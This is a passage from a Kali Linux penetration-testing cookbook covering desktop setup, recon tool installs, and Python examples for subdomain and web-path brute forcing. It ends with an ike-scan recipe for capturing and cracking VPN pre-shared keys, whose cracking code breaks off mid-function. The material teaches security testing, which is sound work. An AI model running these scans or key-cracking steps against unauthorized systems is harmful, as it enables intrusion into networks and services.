Preface 


Kali Linux is the distro that comes to mind when anyone thinks about penetration testing. Every year 
Kali is improved and updated with new tools, making it more powerful. New exploits are released every 
day, and with rapidly evolving technology we have rapidly evolving attack vectors. This book aims to 
cover the approach to some of the unique scenarios a user may face while performing a pentest. 


This book specifically focuses on using Kali Linux to perform a pentest, starting from information 
gathering through to reporting. It also covers recipes for testing wireless networks and web 
applications, escalating privileges on both Windows and Linux machines, and even exploiting 
vulnerabilities in software programs. 


What this book covers 


Chapter 1, Kali — An Introduction, covers installing Kali with different desktop environments and 
tweaking it a bit by installing a few custom tools. 


Chapter 2, Gathering Intel and Planning Attack Strategies, covers recipes for collecting subdomains 
and other information about a target using multiple tools, such as Shodan. 


Chapter 3, Vulnerability Assessment, talks about methods of hunting for vulnerabilities in the data 
discovered during the information gathering process. 


Chapter 4, Web App Exploitation — Beyond OWASP Top 10, is about the exploitation of some less common 
vulnerabilities, such as serialization flaws and server misconfiguration. 


Chapter 5, Network Exploitation on Current Exploitation, focuses on different tools that can be used to 
exploit vulnerabilities in servers on the network running services such as Redis and MongoDB. 


Chapter 6, Wireless Attacks — Getting Past Aircrack-ng, teaches you some new tools for breaking into 
wireless networks, as well as how to use aircrack-ng. 


Chapter 7, Password Attacks — The Fault in Their Stars, talks about identifying and cracking different types 
of hashes. 


Chapter 8, Have Shell, Now What?, covers different ways of escalating privileges on Linux and Windows-based 
machines and then moving further into the network using that machine as a gateway. 


Chapter 9, Buffer Overflows, discusses exploiting different overflow vulnerabilities, such as SEH overwrites, 
stack-based overflows, egg hunting, and so on. 


Chapter 10, Playing with Software-Defined Radios, focuses on exploring the world of radio frequencies and 
using different tools to monitor and view data traveling across different frequency bands. 


Chapter 11, Kali in Your Pocket — NetHunters and Raspberries, talks about how we can install Kali Linux 
on portable devices, such as a Raspberry Pi or a cellphone, and perform a pentest from them. 


Chapter 12, Writing Reports, covers the basics of writing a good quality report of the pentest activity once it 
has been performed. 


What you need for this book 


The OS required is Kali Linux with at least 2 GB of RAM recommended and 20-40 GB of hard disk 
space. 


The hardware needed is an RTL-SDR device for Chapter 10, Playing with Software-Defined Radios, and 
any of the devices listed at the following link for Chapter 11, Kali in Your Pocket — NetHunters and 
Raspberries: 


https://www.offensive-security.com/kali-linux-nethunter-download/ 


We also need an Alfa wireless card (one whose chipset supports monitor mode and packet injection) for Chapter 6, Wireless Attacks — Getting Past Aircrack-ng. 


Who this book is for 


This book is aimed at IT security professionals, pentesters, and security analysts who have basic 
knowledge of Kali Linux and want to learn advanced penetration testing techniques. 


Sections 


In this book, you will find several headings that appear frequently (Getting ready, How to do it..., How it 
works..., There's more..., and See also). To give clear instructions on how to complete a recipe, we use 
these sections as follows: 


Getting ready 


This section tells you what to expect in the recipe, and describes how to set up any software or any 
preliminary settings required for the recipe. 


How to do it... 


This section contains the steps required to follow the recipe. 


How it works... 


This section usually consists of a detailed explanation of what happened in the previous section. 


There's more... 


This section consists of additional information about the recipe in order to make the reader more 
knowledgeable about the recipe. 


See also 


This section provides helpful links to other useful information for the recipe. 


Conventions 


In this book, you will find a number of text styles that distinguish between different kinds of information. 
Here are some examples of these styles and an explanation of their meaning. Code words in text, database 
table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter 
handles are shown as follows: "To launch fierce, we type fierce -h to see the help menu." 


A block of code is set as follows: 


if (argc < 2) { 
    printf("strcpy() NOT executed....\n"); 
    printf("Syntax: %s <characters>\n", argv[0]); 
    exit(0); 
} 


Any command-line input or output is written as follows: 


fierce -dns host.com -threads 10 


New terms and important words are shown in bold. Words that you see on the screen, for example, in 
menus or dialog boxes, appear in the text like this: "We right-click and navigate to Search for | All 
commands in all modules." 


Warnings or important notes appear like this. 


Tips and tricks appear like this. 






Reader feedback 


Feedback from our readers is always welcome. Let us know what you think about this book, what you 
liked or disliked. Reader feedback is important for us as it helps us develop titles that you will really get 
the most out of. To send us general feedback, simply e-mail feedback@packtpub.com, and mention the book's 
title in the subject of your message. If there is a topic that you have expertise in and you are interested in 
either writing or contributing to a book, see our author guide at www.packtpub.com/authors. 


Customer support 


Now that you are the proud owner of a Packt book, we have a number of things to help you to get the most 
from your purchase. 


Downloading the example code 


You can download the example code files for this book from your account at http://www.packtpub.com. If you 
purchased this book elsewhere, you can visit http://www.packtpub.com/support and register to have the files 
e-mailed directly to you. You can download the code files by following these steps: 


1. Log in or register to our website using your e-mail address and password. 
2. Hover the mouse pointer on the SUPPORT tab at the top. 
3. Click on Code Downloads & Errata. 
4. Enter the name of the book in the Search box. 
5. Select the book for which you're looking to download the code files. 
6. Choose from the drop-down menu where you purchased this book from. 
7. Click on Code Download. 




You can also download the code files by clicking on the Code Files button on the book's webpage at the 
Packt Publishing website. This page can be accessed by entering the book's name in the Search box. 
Please note that you need to be logged in to your Packt account. Once the file is downloaded, please make 
sure that you unzip or extract the folder using the latest version of: 


WinRAR / 7-Zip for Windows 
Zipeg / iZip / UnRarX for Mac 
7-Zip / PeaZip for Linux 


The code bundle for the book is also hosted on GitHub at https://github.com/PacktPublishing/Kali-Linux-An-Ethical-Hackers-Cookbook. 
We also have other code bundles from our rich catalog of books and videos available at https://github.com/PacktPublishing/. 
Check them out! 


Downloading the color images of this book 


We also provide you with a PDF file that has color images of the screenshots/diagrams used in this book. 
The color images will help you better understand the changes in the output. You can download this file 
from https://www.packtpub.com/sites/default/files/downloads/KaliLinuxAnEthicalHackersCookbook_ColorImages.pdf. 


Errata 


Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you find 
a mistake in one of our books, maybe a mistake in the text or the code, we would be grateful if you could 
report this to us. By doing so, you can save other readers from frustration and help us improve subsequent 
versions of this book. If you find any errata, please report them by visiting http://www.packtpub.com/submit-errata, 
selecting your book, clicking on the Errata Submission Form link, and entering the details of your errata. 
Once your errata are verified, your submission will be accepted and the errata will be uploaded to our 
website or added to any list of existing errata under the Errata section of that title. To view the previously 
submitted errata, go to https://www.packtpub.com/books/content/support and enter the name of the book in the search 
field. The required information will appear under the Errata section. 


Piracy 


Piracy of copyrighted material on the Internet is an ongoing problem across all media. At Packt, we take 
the protection of our copyright and licenses very seriously. If you come across any illegal copies of our 
works in any form on the Internet, please provide us with the location address or website name 
immediately so that we can pursue a remedy. Please contact us at copyright@packtpub.com with a link to the 
suspected pirated material. We appreciate your help in protecting our authors and our ability to bring you 
valuable content. 


Questions 


If you have a problem with any aspect of this book, you can contact us at questions@packtpub.com, and we will 
do our best to address the problem. 


Kali — An Introduction 


In this chapter, we will cover the following recipes: 


Configuring Kali Linux 
Configuring the Xfce environment 
Configuring the Mate environment 
Configuring the LXDE environment 
Configuring the e17 environment 
Configuring the KDE environment 
Prepping up with custom tools 
Pentesting VPN's ike-scan 
Setting up proxychains 
Going on a hunt with Routerhunter 


Introduction 


Kali was first released in March 2013 as a from-scratch rebuild of BackTrack. This Debian-based distro 
shipped with over 300 tools specialized for penetration testing and digital forensics. It is maintained and 
funded by Offensive Security Ltd, with Mati Aharoni, Devon Kearns, and Raphael Hertzog as its core 
developers. 


Kali 2.0 was released in August 2015, and the distribution moved to a rolling release model with Kali 2016.1. 
Kali 2016.2 added official images for the KDE, Mate, LXDE, e17, and Xfce desktop environments alongside 
the default GNOME build. 


Kali already comes pre-equipped with hundreds of tools and utilities that help penetration testers around 
the globe do their job efficiently. In this chapter we will primarily cover some custom tweaks that give 
users an even better pentesting experience. 


Configuring Kali Linux 


We will use the official Kali Linux ISO provided by Offensive Security to install and configure different 
desktop environments such as Mate, e17, Xfce, LXDE, and KDE desktops. 


Getting ready 


To start with this recipe we will use the 64-bit Kali Linux ISO listed on the Kali Linux download page: 


https://www.kali.org/downloads/ 


For users looking to configure Kali in a virtual machine such as VMware, VirtualBox, 
and so on, a pre-built image can be downloaded from 
https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/. 





We will use the virtual image in this chapter and customize it with some additional tools. 


How to do it... 


You can configure Kali with the help of the given steps: 


1. Double-click the VirtualBox image; it opens in VirtualBox: 


[Screenshot: Oracle VM VirtualBox Manager with the Import Virtual Appliance dialog] 

2. Click Import. VirtualBox lists the appliance details (Name Kali-Linux-2016.2-vbox-amd64, Product Kali Linux, 
Vendor Offensive Security, Vendor-URL https://www.offensive-security.com/) together with the warning 
Appliance is not signed, and then imports the virtual disk image Kali-Linux-2016.2-vbox-amd64-disk1.vmdk. 
Because the appliance carries no signature, verify the SHA256 checksum of the downloaded archive against the 
value published on the download page before you import it: 

[Screenshot: appliance import in progress, 1 minute remaining] 


3. Start the machine and log in as root with the default password toor. Change this default password (run passwd) before the machine is attached to any shared network: 


4. Now, Kali is started and by default is configured with the GNOME desktop environment: 





[Screenshot: the default Kali GNOME desktop] 








How it works... 


With the pre-built image you don't need to worry about the installation process; consider it a 
ready-to-go solution. Simply click Start and the virtual machine will boot Kali just like a physical 
machine. 


Configuring the Xfce environment 


Xfce is a free, fast, and lightweight desktop environment for Unix and Unix-like platforms. It was started 
by Olivier Fourdan in 1996. The name Xfce originally stood for XForms Common Environment, but 
since that time Xfce has been rewritten twice and no longer uses the XForms toolkit. 


How to do it... 


To configure the Xfce environment follow the given steps: 


1. Run apt-get update so the package lists are current, then install Xfce along with its plugins and goodies with the following command: 


apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies 


The following screenshot shows the preceding command: 


[Screenshot: the apt-get install command entered in a root terminal] 





2. Type y when it asks for confirmation on additional space requirements. 
3. Select Ok on the dialog box that appears. 
4. We select lightdm as our default display manager and press the Enter key. 
5. When the installation is complete we open a Terminal window and type the following command: 


update-alternatives --config x-session-manager 


The following screenshot shows the output of the preceding command: 


root@kali:~# update-alternatives --config x-session-manager 
There are 3 choices for the alternative x-session-manager (providing /usr/bin/x-session-manager). 

  Selection    Path                     Priority   Status 
------------------------------------------------------------ 
* 0            /usr/bin/gnome-session    50        auto mode 
  1            /usr/bin/gnome-session    50        manual mode 
  2            /usr/bin/startxfce4       50        manual mode 
  3            /usr/bin/xfce4-session    40        manual mode 

Press <enter> to keep the current choice[*], or type selection number: 





6. Choose the option xfce4-session (in our case 3) and press the Enter key. 


7. Log out and log in again or you can restart the machine and we will see the Xfce environment: 


[Screenshot: the Xfce desktop with its Applications menu and panel] 





Configuring the Mate environment 


The Mate desktop environment is a continuation of GNOME 2. It was first released in 2011. 


How to do it... 


To configure the Mate environment follow the given steps: 


1. We start by using the following command to install the Mate environment: 


apt-get install desktop-base mate-desktop-environment 

The following screenshot shows the preceding command: 


[Screenshot: the apt-get install command entered in a root terminal] 





2. Type y when it asks for confirmation on additional space requirements. 
3. When installation is complete we will use the following command to set Mate as our default 
environment: 


update-alternatives --config x-session-manager 


4. Choose the option mate-session (in our case 2) and press the Enter key: 


root@kali:~# update-alternatives --config x-session-manager 
There are 2 choices for the alternative x-session-manager (providing /usr/bin/x-session-manager). 

  Selection    Path                     Status 
-------------------------------------------------- 
* 0            /usr/bin/gnome-session    auto mode 
  1            /usr/bin/gnome-session    manual mode 
  2            /usr/bin/mate-session     manual mode 

Press <enter> to keep the current choice[*], or type selection number: 2 





5. Log out and log in again or restart and we will see the Mate environment: 
[Screenshot: the Mate desktop with the Kali Applications menu open (01 - Information Gathering through 
14 - System Services) and a database submenu listing sidguesser, SQLite database browser, sqlmap, sqlninja and sqlsus] 
Configuring the LXDE environment 


LXDE is a free, open source desktop environment written in C using the GTK+ toolkit for Unix and other POSIX 
platforms. Lightweight X11 Desktop Environment (LXDE) is the default environment of many 
operating systems such as Knoppix, Raspbian, Lubuntu, and so on. 


How to do it... 


To configure the LXDE environment follow the given steps: 


1. We start by using the following command to install LXDE: 


apt-get install lxde-core lxde 


2. Type y when it asks for confirmation on additional space requirements. 
3. When the installation is complete we open a Terminal window and type the following command: 


update-alternatives --config x-session-manager 


The following screenshot shows the output for the preceding command: 


root@kali:~# update-alternatives --config x-session-manager 
There are 4 choices for the alternative x-session-manager (providing /usr/bin/x-session-manager). 

  Selection    Path                     Status 
-------------------------------------------------- 
* 0            /usr/bin/gnome-session    auto mode 
  1            /usr/bin/gnome-session    manual mode 
  2            /usr/bin/lxsession        manual mode 
  3            [entry unreadable in the screenshot]   manual mode 
  4            /usr/bin/startlxde        manual mode 

Press <enter> to keep the current choice[*], or type selection number: 4 





4. Choose the LXDE session option (lxsession or startlxde; in our case 4) and press Enter. 


5. Log out and log in again and we will see the LXDE environment: 


[Screenshot: the LXDE desktop with the Kali menu open at 01 - Information Gathering, showing the submenus 
DNS Analysis, IDS/IPS Identification, Live Host Identification, Network & Port Scanners, OSINT Analysis, 
Route Analysis, SMB Analysis, SMTP Analysis, SNMP Analysis and SSL Analysis, and the tools dmitry, 
dnmap-client, dnmap-server, ike-scan, maltegoce, netdiscover, nmap, p0f, recon-ng, sparta and zenmap; 
the full menu runs from 02 - Vulnerability Analysis to 14 - System Services, followed by Debian, 
Preferences, Run and Logout] 





Configuring the e17 environment 


Enlightenment, also known as E, is a window manager for the X Window System. It was first 
released in 1997. It has many features, such as the Engage dock, virtual desktops, tiling, and so on. 


How to do it... 


Due to compatibility issues and dependency hassles it is better to set up the e17 environment as a 
separate machine. A dedicated ISO image (Kali 64-bit e17) is already available on the official Kali Linux 
website and can be downloaded from the following URL: 


https://www.kali.org/downloads/ 


Configuring the KDE environment 


KDE is an international community for free software. The Plasma desktop is one of the most popular 
KDE projects; it is the default desktop environment for many Linux distributions. KDE was 
founded in 1996 by Matthias Ettrich. 


How to do it... 


To configure the KDE environment follow the given steps: 


1. We use the following command to install KDE: 


apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop 


The following screenshot shows the preceding command: 


[Screenshot: the apt install command entered in a root terminal] 





2. Type y when it asks for confirmation on additional space requirements. 
3. Click OK on both the windows that pop up. 
4. When the installation is complete we open a Terminal window and type the following command: 


update-alternatives --config x-session-manager 


The following screenshot shows the output for the preceding command: 


root@kali:~# update-alternatives --config x-session-manager 
There are 2 choices for the alternative x-session-manager (providing /usr/bin/x-session-manager). 

  Selection    Path                     Status 
-------------------------------------------------- 
* 0            /usr/bin/gnome-session    auto mode 
  1            /usr/bin/gnome-session    manual mode 
  2            /usr/bin/startkde         manual mode 

Press <enter> to keep the current choice[*], or type selection number: 2 
update-alternatives: using /usr/bin/startkde to provide /usr/bin/x-session-manager (x-session-manager) in manual mode 
root@kali:~# 





5. Choose the startkde option (in our case 2) and press Enter. 
6. Log out and log in again and we will see the KDE environment: 
[Screenshot: the KDE Plasma desktop] 

Kali already provides prebuilt images of the different desktop environments. These can be 
downloaded from https://www.kali.org/downloads/. 


Prepping up with custom tools 


The tools you will install in this recipe are open source and hosted on GitHub. They are generally faster 
than the packaged alternatives and collect the tweaks that other testers have contributed from their own 
pentesting experience over time. 


Getting ready 


Here is a list of some tools that you will need before we dive deeper into penetration testing. Not to 
worry, you will learn their usage with some real-life examples in the next few chapters. However, 
if you still wish to learn the basics at an early stage, every tool prints its usage with one of these commands: 


toolname --help 

toolname -h 


How to do it... 


Some of the tools are listed in the following sections. 


Dnscan 


Dnscan is a Python tool that uses a wordlist to resolve valid subdomains. To learn about Dnscan follow 
the given steps: 


1. We will use a simple command to clone the git repository: 


git clone https://github.com/rbsec/dnscan.git 


The following screenshot shows the preceding command: 


[Screenshot: the git clone command entered in a root terminal] 





2. You can also download and save it from https://github.com/rbsec/dnscan. 
3. Next we browse into the directory where we downloaded Dnscan. 


4. Run Dnscan by using the following command: 


./dnscan.py -h 


The following screenshot shows the output for the preceding command: 


root@kali:/# cd dnscan 
root@kali:/dnscan# ./dnscan.py -h 
usage: dnscan.py [-h] -d DOMAIN [-w WORDLIST] [-t THREADS] [-6] [-z] [-r] [-T] 
                 [-o OUTPUT_FILENAME] [-D] [-v] 

optional arguments: 
  -h, --help            show this help message and exit 
  -d DOMAIN, --domain DOMAIN 
                        Target domain 
  -w WORDLIST, --wordlist WORDLIST 
                        Wordlist 
  -t THREADS, --threads THREADS 
                        Number of threads 
  -6, --ipv6            Scan for AAAA records 
  -z, --zonetransfer    Only perform zone transfers 
  -r, --recursive       Recursively scan subdomains 
  -T, --tld             Scan for TLDs 
  -o OUTPUT_FILENAME, --output OUTPUT_FILENAME 
                        Write output to a file 
  -D, --domain-first    Output domain first, rather than IP 





Subbrute 


Next we will install subbrute. It is very fast and adds a layer of indirection: it sends its queries through 
public open resolvers, so the target's authoritative name servers see the resolvers' addresses rather than yours: 


1. The command here is again simple: 


git clone https://github.com/TheRook/subbrute.git 


The following screenshot shows the preceding command: 


[Screenshot: the git clone command entered in a root terminal] 





2. Or you can download and save it from https://github.com/TheRook/subbrute. 
3. Once the clone is complete we will need a wordlist for it to run, for which we can download 
dnspop's list. This list can be used in the previous recipe too: https://github.com/bitquark/dnspop/tree/master/results 
4. Once both are set up we browse into subbrute's directory and run it using the following 
command: 


./subbrute.py 


5. To run it against a domain with our wordlist we use the following command: 


./subbrute.py -s /path/to/wordlist hostname.com 
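Both dnscan and subbrute do the same core job: take a wordlist, resolve each candidate label under the target domain, and keep the ones that answer. The added example below (written for this page, not code from either project) implements that loop in plain Python together with the one check that separates a useful result from thousands of false positives: wildcard detection. It resolves a few random labels first; if they answer, the domain has a wildcard record, and any candidate that only returns the wildcard address is discarded. The example.test zone, its addresses and the fake_resolve function are constructed so the code runs offline; system_resolve uses the system resolver (subbrute instead queries public open resolvers, which this example does not replicate). 

```python
import random
import socket
import string
from typing import Callable, Dict, List, Optional, Set

# A resolver maps a hostname to its A records, or None for NXDOMAIN.
Resolver = Callable[[str], Optional[List[str]]]


def system_resolve(name: str) -> Optional[List[str]]:
    """Resolve through the system resolver configured in /etc/resolv.conf."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except socket.gaierror:
        return None


def wildcard_ips(domain: str, resolve: Resolver, probes: int = 3) -> Set[str]:
    """Resolve a few random labels; any answer reveals a wildcard record.

    Every address a wildcard returns is ignored later, otherwise each word in
    the list would look like a valid host.
    """
    found: Set[str] = set()
    alphabet = string.ascii_lowercase + string.digits
    for _ in range(probes):
        label = "".join(random.choices(alphabet, k=16))
        answer = resolve(f"{label}.{domain}")
        if answer:
            found.update(answer)
    return found


def brute_subdomains(domain: str, wordlist: List[str], resolve: Resolver) -> Dict[str, List[str]]:
    """Return {fqdn: addresses} for wordlist entries that resolve to a non-wildcard address."""
    wildcard = wildcard_ips(domain, resolve)
    hits: Dict[str, List[str]] = {}
    for word in wordlist:
        word = word.strip().lower()
        if not word or word.startswith("#"):
            continue
        fqdn = f"{word}.{domain}"
        answer = resolve(fqdn)
        if not answer:
            continue
        # A host that only shares the wildcard's address is indistinguishable
        # from noise, so it is dropped; hosts with their own address are kept.
        real = [ip for ip in answer if ip not in wildcard]
        if real:
            hits[fqdn] = real
    return hits


# --- constructed sample zone, so the example runs offline -------------------
FAKE_ZONE: Dict[str, List[str]] = {
    "www.example.test": ["203.0.113.10"],
    "mail.example.test": ["203.0.113.25"],
    "dev.example.test": ["198.51.100.7"],
}
WILDCARD_IP = "203.0.113.99"  # *.example.test answers with this address


def fake_resolve(name: str) -> Optional[List[str]]:
    """Stand-in for DNS: the constructed zone above plus a wildcard under example.test."""
    if name in FAKE_ZONE:
        return FAKE_ZONE[name]
    if name.endswith(".example.test"):
        return [WILDCARD_IP]
    return None


if __name__ == "__main__":
    words = ["www", "mail", "dev", "admin", "ftp", "vpn"]
    for host, ips in sorted(brute_subdomains("example.test", words, fake_resolve).items()):
        print(host, ", ".join(ips))
    # Against a real target, swap fake_resolve for system_resolve and load the
    # words from a file such as dnspop's results list.
```

Without the wildcard step, admin, ftp and vpn would all be reported as live hosts at 203.0.113.99; with it only the three hosts that have their own records survive. 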


Dirsearch 


Our next tool in line is dirsearch. As the name suggests, it is a simple command-line tool that brute forces 
directories and files on a web server. Being multithreaded, it is typically much faster than the traditional DIRB: 


1. The command to install is: 


git clone https://github.com/maurosoria/dirsearch.git 


2. Or you can download and save it from https://github.com/maurosoria/dirsearch. The following screenshot 
shows the preceding command: 


[Screenshot: the git clone command entered in a root terminal] 





3. Once the cloning is complete browse to the directory and run the tool by using the following: 


./dirsearch.py -u hostname.com -e aspx,php 


The following screenshot shows the output for the preceding command (the screenshot was taken with the 
target google.com and the extensions pl,html): 


root@kali:~/dirsearch 

Extensions: pl, html | Threads: 10 | Wordlist size: 5541 
Error Log: /root/dirsearch/logs/errors-16-12-07_07-34-06.log 
Target: google.com 

[07:34:06] Starting: 
[Screenshot continues with the discovered paths, for example https://www.google.com/2602, /a, /about.html, 
/about and /account, and the redirects to https://accounts.google.com/ManageAccount and 
https://accounts.google.com/login reported for the login.* and signin candidates] 
Last request to: admin_info.pl 
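dirsearch's job is to turn a wordlist and a set of extensions into candidate paths and keep the ones the server does not reject. The added example below (written for this page, not dirsearch's own code) does the same in plain Python and adds the check that matters most on real targets: a soft-404 baseline. Before the scan it requests a couple of random paths; if the server answers those with 200, every later 200 response of the same size is treated as the same "not found" page and dropped. The %EXT% placeholder follows dirsearch's wordlist convention. The fake site, its responses and the fake_fetch function are constructed so the example runs offline; http_fetch builds a real fetcher on top of urllib for use against a live host (urllib follows redirects, so a 301 shows up with the final status, which is a simplification relative to dirsearch). 

```python
import random
import string
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Set, Tuple

# fetch(path) -> (HTTP status, response body)
Fetcher = Callable[[str], Tuple[int, bytes]]


def expand_wordlist(words: List[str], extensions: List[str]) -> List[str]:
    """Entries containing %EXT% are expanded once per extension; others are tried as-is."""
    paths: List[str] = []
    for word in words:
        word = word.strip()
        if not word or word.startswith("#"):
            continue
        if "%EXT%" in word:
            paths.extend(word.replace("%EXT%", ext) for ext in extensions)
        else:
            paths.append(word)
    return paths


def soft404_sizes(fetch: Fetcher, probes: int = 2) -> Set[int]:
    """Body sizes the server returns with status 200 for paths that cannot exist."""
    sizes: Set[int] = set()
    for _ in range(probes):
        bogus = "/" + "".join(random.choices(string.ascii_lowercase, k=14))
        status, body = fetch(bogus)
        if status == 200:
            sizes.add(len(body))
    return sizes


def brute_paths(fetch: Fetcher, words: List[str], extensions: List[str],
                ignore_status: Tuple[int, ...] = (404,)) -> Dict[str, int]:
    """Return {path: status} for candidates the server did not reject."""
    baseline = soft404_sizes(fetch)
    hits: Dict[str, int] = {}
    for candidate in expand_wordlist(words, extensions):
        path = "/" + candidate.lstrip("/")
        status, body = fetch(path)
        if status in ignore_status:
            continue
        if status == 200 and len(body) in baseline:
            continue  # same page the server gives for random junk: soft 404
        hits[path] = status
    return hits


def http_fetch(base_url: str, timeout: float = 5.0) -> Fetcher:
    """Real fetcher over urllib; errors that carry a status (403, 404, ...) are returned, not raised."""
    base = base_url.rstrip("/")

    def fetch(path: str) -> Tuple[int, bytes]:
        req = urllib.request.Request(base + path, headers={"User-Agent": "dirsearch-example"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:
            return err.code, err.read()

    return fetch


# --- constructed sample site, so the example runs offline -------------------
SOFT404 = (200, b"<html><body>Sorry, that page does not exist.</body></html>")
FAKE_SITE: Dict[str, Tuple[int, bytes]] = {
    "/admin/": (301, b""),
    "/login.php": (200, b"<html><form action='/login.php' method='post'>...</form></html>"),
    "/backup.aspx": (403, b"Forbidden"),
}


def fake_fetch(path: str) -> Tuple[int, bytes]:
    """Stand-in for a web server that answers unknown paths with a 200 soft 404."""
    return FAKE_SITE.get(path, SOFT404)


if __name__ == "__main__":
    words = ["admin/", "login.%EXT%", "backup.%EXT%", "secret.%EXT%", "robots.txt"]
    for path, status in sorted(brute_paths(fake_fetch, words, ["aspx", "php"]).items()):
        print(status, path)
    # Live use: brute_paths(http_fetch("https://hostname.com"), words, ["aspx", "php"])
```

Against the constructed site a naive scanner that only drops 404s would report every candidate as found, because the server answers everything with 200; the baseline reduces that to the three paths that actually differ. 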





Pentesting VPN's ike-scan 


Often during a pentest we encounter VPN endpoints, yet testing them is not a widely known technique. 
IPsec VPN endpoints use the Internet Key Exchange (IKE) protocol to negotiate a security association 
between two peers before the VPN tunnel is established. 


IKEv1 has two phases. Phase 1 authenticates the peers and establishes a secure channel (the ISAKMP SA); 
phase 2 (Quick Mode) runs inside that channel and negotiates the IPsec SAs that encrypt the actual traffic. 


Our focus here is phase 1, which can run in one of two modes: 


Main mode 
Aggressive mode 


We will hunt for VPN endpoints that accept aggressive mode with pre-shared key (PSK) authentication, because 
in that combination the responder's authentication hash is sent in the clear and can be cracked offline. 


Getting ready 


For this recipe we will use the tools ike-scan and ikeprobe. First we install ike-scan by cloning the git 
repository: 


git clone https://github.com/royhills/ike-scan.git 


Or you can download it from https://github.com/royhills/ike-scan. ike-scan is also packaged in Kali 
(apt-get install ike-scan) if you do not need the latest source. 


How to do it... 


To configure ike-scan follow the given steps: 


1. Browse to the directory where ike-scan was cloned. 
2. Install autoconf by running the following command: 


apt-get install autoconf 


3. Run autoreconf --install to generate the configure script. 
4. Run ./configure. 
5. Run make to build the project. 
6. Run make check to verify the build. 
7. Run make install to install ike-scan. 
8. To scan a host for an aggressive mode handshake, use the following command: 


ike-scan x.x.x.x -M -A 


Here -A requests aggressive mode and -M prints the response one attribute per line. A target that answers 
Aggressive Mode Handshake returned with Auth=PSK in its SA is the case we are after. 


The following screenshot shows the output for the preceding command: 


Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 
x.x.x.x   Main Mode Handshake returned 
          HDR=(CKY-R=1f[...]) 
          SA=(Enc=3DES Hash=[unreadable] Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) 

IKE Backoff Patterns: 

IP Address      No.   Recv time            Delta Time 
x.x.x.x         1     [unreadable] 
Implementation guess: Linksys Etherfast 

Ending ike-scan 1.9.4: 1 hosts scanned in 60.452 seconds (0.02 hosts/sec). 1 returned handshake; 0 returned notify 





9. Some endpoints only answer once a valid group name (the IKE identity) is supplied, for example vpn: 


ike-scan x.x.x.x -M -A --id=vpn 


The following screenshot shows ike-scan's help output (ike-scan -h), which lists the available options: 


root@kali:~# ike-scan -h 
Usage: ike-scan [options] [hosts...] 

Target hosts must be specified on the command line unless the --file option is 
given, in which case the targets are read from the specified file instead. 

The target hosts can be specified as IP addresses or hostnames. You can also 
specify IPnetwork/bits (e.g. 192.168.1.0/24) to specify all hosts in the given 
network (network and broadcast addresses included), and IPstart-IPend 
(e.g. 192.168.1.3-192.168.1.27) to specify all hosts in the inclusive range. 

These different options for specifying target hosts may be used both on the 
command line, and also in the file specified with the --file option. 

In the options below a letter or word in angle brackets like <f> denotes a 
value or string that should be supplied. The corresponding text should 
indicate the meaning of this value or string. When supplying the value or 
string, do not include the angle brackets. Text in square brackets like [<f>] 
mean that the enclosed text is optional. This is used for options which take 
an optional argument. 

Options: 

--help or -h            Display this usage message and exit. 
[screenshot truncated] 





We can even brute force the group names using the following script: 
https://github.com/SpiderLabs/groupenum 


The command: 

./dt_group_enum.sh x.x.x.x groupnames.dic 


Cracking the PSK 


To crack the PSK follow the given steps: 


1. Add the -P flag (--pskcrack) to the ike-scan command; the response then includes the captured hash 
together with the handshake parameters needed to crack it. 
2. To save these to a file, give a filename with the flag, for example -Pkey.txt (or --pskcrack=key.txt). 
3. Next we can use psk-crack in brute force mode with the following command: 


psk-crack -b 5 /path/to/pskkey 


Where -b selects brute force mode and 5 is the maximum key length to try. 
4. To use a dictionary based attack we use the following command: 


psk-crack -d /path/to/dictionary /path/to/pskkey 
The following screenshot shows the output for the preceding command: 


Starting psk-crack [ike-scan 1.9] (http://www.nta-monitor.com/tools/ike-scan/) 
Running in dictionary cracking mode 
key "123456" matches SHA1 hash d46e5c224092fedda5a1733aa71e515d0dfbb97e 
Ending psk-crack: 1 iterations in 0.014 seconds (72.87 iterations/sec) 





How it works... 


In aggressive mode the responder authenticates itself in its very first reply, before any encryption keys have 
been agreed, so its authentication hash (HASH_R) travels in the clear. With PSK authentication that hash is 
HMAC(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), where SKEYID = HMAC(PSK, Ni_b | Nr_b). Every 
input except the PSK is visible in the captured packets, so we can compute candidate hashes offline and 
compare them against the captured value until the PSK is recovered. 


Main mode does not expose this: it uses a six-message exchange in which the identities and hashes are only 
sent in messages 5 and 6, after the Diffie-Hellman exchange, and those messages are already encrypted. 
Aggressive mode compresses the exchange into three messages and gives up that protection. 
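The cracking step that psk-crack performs can be written out in a few lines, which makes the explanation above concrete. The added example below (written for this page, not ike-scan's or psk-crack's code) recomputes HASH_R from the handshake fields for each candidate key and stops when it matches the captured value. The field order in parse_pskcrack_line follows the colon-separated hex line that ike-scan -P writes (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r); the hash function is chosen from the hash length, 20 bytes meaning SHA1 and 16 meaning MD5. The handshake values in make_capture are constructed placeholders of the right size for group 2 (modp1024), not a real capture; the only thing that matters for the demonstration is that the hash is derived from them exactly as RFC 2409 specifies. 

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional

FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def prf_for(hash_len: int):
    """IKEv1 prf is HMAC over the negotiated hash; psk-crack infers it from HASH_R's length."""
    if hash_len == 20:
        return hashlib.sha1
    if hash_len == 16:
        return hashlib.md5
    raise ValueError(f"unsupported hash length {hash_len}")


def hash_r(psk: bytes, p: Dict[str, bytes]) -> bytes:
    """RFC 2409: SKEYID = prf(PSK, Ni_b | Nr_b);
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    prf = prf_for(len(p["hash_r"]))
    skeyid = hmac.new(psk, p["ni_b"] + p["nr_b"], prf).digest()
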